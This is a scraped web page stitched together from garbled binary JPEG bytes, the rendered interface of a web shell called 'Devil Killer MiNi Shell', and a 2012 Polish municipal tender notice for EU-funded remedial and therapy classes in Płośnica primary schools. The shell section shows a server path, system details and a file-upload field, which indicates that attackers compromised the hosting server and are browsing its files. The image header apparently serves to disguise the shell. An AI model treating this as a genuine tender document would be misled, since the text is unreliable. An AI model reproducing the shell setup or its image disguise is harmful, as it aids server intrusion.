JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120103/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120103/3456-N-2012.html

<p class="kh_header"><b>Płośnica: Zakup usługi edukacyjnej w ramach realizacji projektu systemowego pn. Indywidualizacja procesu nauczania i wychowania dzieci w szkołach podstawowych w Gminie Płośnica  współfinansowanego z Europejskiego Funduszu Społecznego.</b><br>
<b>Numer ogłoszenia: 3456 - 2012; data zamieszczenia: 03.01.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Urząd Gminy Płośnica , ul. Dworcowa 52, 13-206 Płośnica, woj. warmińsko-mazurskie, tel. 023 6968008, faks 023 6968005.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej, pod którym dostępne są informacje dotyczące dynamicznego systemu zakupów:</b> www.bip.plosnica.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Zakup usługi edukacyjnej w ramach realizacji projektu systemowego pn. Indywidualizacja procesu nauczania i wychowania dzieci w szkołach podstawowych w Gminie Płośnica  współfinansowanego z Europejskiego Funduszu Społecznego..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Przedmiot zamówienia w zakresie szczegółowym polegał będzie na prowadzeniu zajęć dodatkowych realizowanych w ramach projektu systemowego Indywidualizacja procesu nauczania i wychowania dzieci w szkołach podstawowych w Gminie Płośnica z Programu Operacyjnego Kapitał Ludzki, Priorytet IX Rozwój wykształcenia i kompetencji w regionach, Poddziałanie 9.1.2. Wyrównywanie szans edukacyjnych uczniów z grup o utrudnionym dostępie do edukacji oraz zmniejszenie różnic w jakości usług edukacyjnych:
a) Zajęcia realizowane będą dla uczniów z klas I- III w szkołach podstawowych: w Płośnicy, Gródkach, W. Łęcku, Niechłoninie, dla których organem prowadzącym jest Zamawiający: Gmina Płośnica; w roku szkolnym 2011,2012 oraz w roku szkolnym 2012,2013.
b) W ramach zamówienia realizowane będą następujące rodzaje zajęć: 
Zajęcia dydaktyczno wyrównawcze mające na celu zminimalizowanie specyficznych trudności edukacyjnych w zakresie czytania i pisania oraz umiejętności matematycznych;
Zajęcia rozwijające uzdolnienia uczniów w matematyce;
Gimnastyka korekcyjna dla uczniów z wadami postawy;
Zajęcia korekcyjne - wyjazdy na basen dla uczniów z wadami postawy;
Zajęcia logopedyczne dla uczniów z wadami wymowy.
Zajęcia realizowane będą zgodnie z Rozporządzeniem Ministra Edukacji Narodowej z dnia 17 listopada 2010r, w sprawie zasad udzielania i organizacji pomocy psychologiczno - pedagogicznej w publicznych przedszkolach, szkołach i placówkach (Dz. U. nr 228 poz. 1487)
Wykonawca usługi odpowiadał będzie za przygotowanie, realizację i dokumentację zajęć dodatkowych (kary czasu pracy, dzienniki zajęć, listy obecności), sporządzanie miesięcznych zestawień monitoringowych wg wzoru określonego przez Zamawiającego.
Zamawiający dopuszcza składanie ofert częściowych. Zamówienie obejmuje 15 Części. Zamawiający dopuszcza składanie ofert na jedną lub kilka części.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4, 80.10.00.00-5.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 15.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 20.06.2013.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Na podstawie oświadczenia składanego w trybie art. 22 ust. 1 ustawy PZP</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Na podstawie oświadczenia składanego w trybie art. 22 ust. 1 ustawy PZP</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna, że Wykonawca spełnia warunki udziału w postępowaniu określone w pkt 6.1 SIWZ jeżeli oświadczy że spełnia warunki udziału w postępowaniu określone w trybie art. 22 ust 1. PZP, a dodatkowo;
Wykaże się dysponowaniem osobami do wykonania zamówienia. Zamawiający uzna, że wykonawca spełnia ten warunek jeżeli sam posiada, lub dysponuje osobami  posiadającymi kwalifikacje zgodne z Rozporządzeniem Ministra Edukacji Narodowej z dnia 12 marca 2009r. w sprawie szczegółowych kwalifikacji wymaganych od nauczycieli oraz określenia szkół i wypadków, w których można zatrudnić nauczycieli niemających wyższego wykształcenia lub ukończonego zakładu kształcenia nauczycieli (Dz. U. nr 50 poz. 400), tj.:
a)	Osoby do prowadzenia zajęć dydaktyczno wyrównawczych  (dotyczy części zamówienia: cz. 1; cz. 2; cz. 6; cz. 7; cz. 10; cz. 11; cz. 13; cz. 14) oraz do prowadzenia zajęć z uczniem zdolnym ( cz. 4 i cz.9) powinny mieć:
a.	ukończone studia wyższe na kierunku pedagogika w specjalności przygotowującej do pracy z dziećmi 
w wieku wczesnoszkolnym;
lub
b.	ukończony zakład kształcenia nauczycieli w specjalności przygotowującej do pracy z dziećmi w wieku wczesnoszkolnym;
lub
c.	ukończone studia magisterskie, studia pierwszego stopnia na kierunku zgodnym z zajęciami na prowadzenie których składana jest oferta oraz posiadać przygotowanie pedagogiczne;
lub
d.	ukończone studia magisterski, studia pierwszego stopnia na kierunku, którego zakres określony 
w standardzie kształcenia, w treściach podstawowych i kierunkowych obejmuje treści zajęć na prowadzenie których składana jest oferta oraz posiadać przygotowanie pedagogiczne;
lub
e.	ukończone studia magisterskie, studia pierwszego stopnia na kierunku (specjalności) innym niż charakter zajęć oraz studia podyplomowe, kurs kwalifikacyjny w zakresie zajęć na prowadzenie których składana jest oferta oraz posiadać przygotowanie pedagogiczne;
lub
f.	ukończyła zakład kształcenia nauczyciel w specjalności odpowiadającej prowadzonym zajęciom na które składana jest oferta;
lub
g.	ukończyła zakład kształcenia nauczycieli w specjalności innej niż zajęcia na które składana jest oferta, a ponadto ukończyła kurs kwalifikacyjny w zakresie zajęć na które składana jest oferta.
b)	osoby do prowadzenia zajęć logopedycznych (dotyczy części zamówienia: cz. 3;cz. 8; cz. 12; cz.15 powinny mieć:
a.	ukończone studia magisterskie,pierwszego stopnia w zakresie logopedii oraz posiadać przygotowanie pedagogiczne;
lub
b.	ukończone studia magisterskie,pierwszego stopnia na dowolnym kierunku i studia podyplomowe w zakresie logopedii oraz posiadać przygotowanie pedagogiczne;
c)	osoby do prowadzenia zajęć z gimnastyki korekcyjnej (dotyczy cz. 5 zamówienia) powinny mieć:
a.	ukończone studia magisterskie,studia pierwszego stopnia na kierunku zgodnym z zajęciami na prowadzenie których składana jest oferta oraz posiadać przygotowanie pedagogiczne;
lub
b.	ukończone studia magisterskie,studia pierwszego stopnia na kierunku, którego zakres określony 
w standardzie kształcenia, w treściach podstawowych i kierunkowych obejmuje treści zajęć na prowadzenie których składana jest oferta oraz posiadać przygotowanie pedagogiczne;
lub
c.	ukończone studia magisterskie,studia pierwszego stopnia na kierunku (specjalności) innym niż charakter zajęć oraz studia podyplomowe,kurs kwalifikacyjny w zakresie zajęć na prowadzenie których składana jest oferta oraz posiadać przygotowanie pedagogiczne;
lub
d.	ukończyła zakład kształcenia nauczyciel w specjalności odpowiadającej prowadzonym zajęciom na które składana jest oferta;
lub
e.	ukończyła zakład kształcenia nauczycieli w specjalności innej niż zajęcia na które składana jest oferta, a ponadto ukończyła kurs kwalifikacyjny w zakresie zajęć na które składana jest oferta.
lub
f.	świadectwo dojrzałości i tytuł zawodowy trenera lub instruktora w określonej dyscyplinie sportu, uzyskany zgodnie z przepisami w sprawie kwalifikacji, stopni i tytułów zawodowych w dziedzinie kultury fizycznej oraz szczegółowych zasad i trybu ich uzyskiwania, oraz posiadać przygotowanie pedagogiczne.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Na podstawie oświadczenia składanego w trybie art. 22 ust. 1 ustawy PZP</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

</ul></li>
<li>
</li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Oryginał pełnomocnictwa udzielonego osobom podpisującym ofertę o ile prawo 
do reprezentowania Wykonawcy w powyższym zakresie nie wynika wprost z dokumentu rejestrowego;
Oryginał pełnomocnictwa do reprezentowania w postępowaniu o udzielenie zamówienia 
albo reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego 
w przypadku Wykonawców wspólnie ubiegających 5ię o udzielenie zamówienia.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.plosnica.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy w Płośnicy, 13-206 Płośnica ul. Dworcowa 52,.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 12.01.2012 godzina 10:00, miejsce: Urząd Gminy w Płośnicy, 13-206 Płośnica ul. Dworcowa 52, Sekretariat I piętro.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> do 10.02.2012.</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt współfinansowany z Europejskieg Funduszu Społecznego w ramach Programu Operacyjnego Kapitał Ludzki Priorytet IX Rozwój wykształcenia i kompetencji w regionach.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> prowadzenie zajęć dydaktyczno wyrównawczych dla uczniów klas I - III Szkoły Podstaowej w Płośnicy z trudnościami w nauce matematyki.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> a)	Ilość godzin zajęć w całym okresie realizacji zamówienia: 75h, w tym:
a.	w roku szkolnym 2011/2012 - 30h; 
b.	w roku szkolnym 2012/2013 - 45h;
b)	Maksymalna liczba grup w ramach zajęć: 3 grupy;
c)	Maksymalna liczba uczniów w jednej grupie: 8 uczniów.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4, 80.10.00.00-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 20.06.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> prowadzenie zajęć dydaktyczno wyrównawczych dla uczniów klas I - III  Szkoły Podstawowej w Płośnicy z trudnościami w czytaniu i pisaniu..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> a)	Ilość godzin zajęć w całym okresie realizacji zamówienia: 75h, w tym:
a.	w roku szkolnym 2011/2012 - 30h; 
b.	w roku szkolnym 2012/2013 - 45h;
b)	Maksymalna liczba grup w ramach zajęć: 3 grupy;
c)	Maksymalna liczba uczniów w jednej grupie: 8 uczniów..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4, 80.10.00.00-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 20.06.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Zajęcia logopedyczne dla uczniów klas I - III Szkoły Podstawowej w Płośnicy z zaburzeniami mowy.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> a)	Ilość godzin zajęć w całym okresie realizacji zamówienia: 80h, w tym:
a.	w roku szkolnym 2011/2012 - 40h; 
b.	w roku szkolnym 2012/2013 - 40h;
b)	Maksymalna liczba grup w ramach zajęć:  5 grup;
c)	Maksymalna liczba uczniów w jednej grupie: 4 uczniów..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4, 80.10.00.00-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 20.06.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> prowadzenie zajęć rozwijających umiejętności matematyczne dla uczniów zdolnych klas I - III Szkoły Podstawowej w Płośnicy:.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> a)	Ilość godzin zajęć w całym okresie realizacji zamówienia: 70h, w tym:
a.	w roku szkolnym 2011/2012 - 35h; 
b.	w roku szkolnym 2012/2013 - 35h;
b)	Maksymalna liczba grup w ramach zajęć: 3 grupy;
c)	Maksymalna liczba uczniów w jednej grupie: 8 uczniów..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4, 80.10.00.00-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 20.06.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> prowadzenie zajęć gimnastyki korekcyjnej  dla uczniów klas I - III Szkoły Podstawowej w Gródkach z wadami postawy:.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> a)	Ilość godzin zajęć w całym okresie realizacji zamówienia: 60h, w tym:
a.	w roku szkolnym 2011/2012 - 30h; 
b.	w roku szkolnym 2012/2013 - 30h;
b)	Maksymalna liczba grup w ramach zajęć: 2 grupy;
c)	Maksymalna liczba uczniów w jednej grupie: 5  uczniów..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4, 80.10.00.00-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 20.06.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> sprawowanie opieki nad uczniami klas I - III Szkoły Podstawowej w Gródkach z wadami postawy podczas wyjazdów na basen:.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> a)	Ilość wyjazdów na basen w całym okresie realizacji zamówienia: 18 wyjazdów, w tym:
a.	w roku szkolnym 2011/2012 - 9 wyjazdów; 
b.	w roku szkolnym 2012/2013 - 9 wyjazdów;
b)	Maksymalna liczba grup: 1 grupa;
c)	Maksymalna liczba uczniów w jednej grupie: 8 uczniów..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4, 80.10.00.00-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 20.06.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> prowadzenie zajęć dydaktyczno wyrównawczych dla uczniów klas I - III 
Szkoły Podstawowej w Gródkach z trudnościami w czytaniu i pisaniu.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> a)	Ilość godzin zajęć w całym okresie realizacji zamówienia: 80h, w tym:
a.	w roku szkolnym 2011/2012 - 40h; 
b.	w roku szkolnym 2012/2013 - 40h;
b)	Maksymalna liczba grup w ramach zajęć: 2 grupy;
c)	Maksymalna liczba uczniów w jednej grupie: 8  uczniów.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4, 80.10.00.00-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 20.06.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 8 <b>NAZWA:</b> prowadzenie zajęć logopedycznych dla uczniów klas I - III Szkoły Podstawowej w Gródkach z wadami wymowy:.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> a)	Ilość godzin zajęć w całym okresie realizacji zamówienia: 60h, w tym:
a.	w roku szkolnym 2011/2012 - 30h; 
b.	w roku szkolnym 2012/2013 - 30h;
b)	Maksymalna liczba grup w ramach zajęć: 1 grupa;
c)	Maksymalna liczba uczniów w jednej grupie: 4 uczniów.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4, 80.10.00.00-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 20.06.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 9 <b>NAZWA:</b> prowadzenie zajęć rozwijających umiejętności matematyczne dla uczniów zdolnych klas I - III Szkoły Podstawowej w Gródkach..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> a)	Ilość godzin zajęć w całym okresie realizacji zamówienia: 60h, w tym:
a.	w roku szkolnym 2011/2012 - 30h; 
b.	w roku szkolnym 2012/2013 - 30h;
b)	Maksymalna liczba grup w ramach zajęć: 1 grupa;
c)	Maksymalna liczba uczniów w jednej grupie: 8  uczniów.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4, 80.10.00.00-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 20.06.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 10 <b>NAZWA:</b> prowadzenie zajęć dydaktyczno wyrównawczych dla uczniów klas I - III 
Szkoły Podstawowej w Wielkim Łęcku  z trudnościami w czytaniu i pisaniu.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> a)	Ilość godzin zajęć w całym okresie realizacji zamówienia: 60h, w tym:
a.	w roku szkolnym 2011/2012 - 30h; 
b.	w roku szkolnym 2012/2013 - 30h;
b)	Maksymalna liczba grup w ramach zajęć: 2 grupy;
c)	Maksymalna liczba uczniów w jednej grupie: 8  uczniów..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4, 80.10.00.00-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 20.06.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 11 <b>NAZWA:</b> prowadzenie zajęć  dydaktyczno wyrównawczych dla uczniów klas I - III 
Szkoły Podstawowej w Wielkim Łęcku z trudnościami w nauce matematyki.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> a)	Ilość godzin zajęć w całym okresie realizacji zamówienia: 60h, w tym:
a.	w roku szkolnym 2011/2012 - 30h; 
b.	w roku szkolnym 2012/2013 - 30h;
b)	Maksymalna liczba grup w ramach zajęć: 1 grupa;
c)	Maksymalna liczba uczniów w jednej grupie: 8 uczniów.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4, 80.10.00.00-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 20.06.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 12 <b>NAZWA:</b> prowadzenie zajęć logopedycznych dla uczniów klas I - III Szkoły Podstawowej w Wielkim Łęcku z zaburzeniami mowy.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> a)	Ilość godzin zajęć w całym okresie realizacji zamówienia: 60h, w tym:
a.	w roku szkolnym 2011/2012 - 30h; 
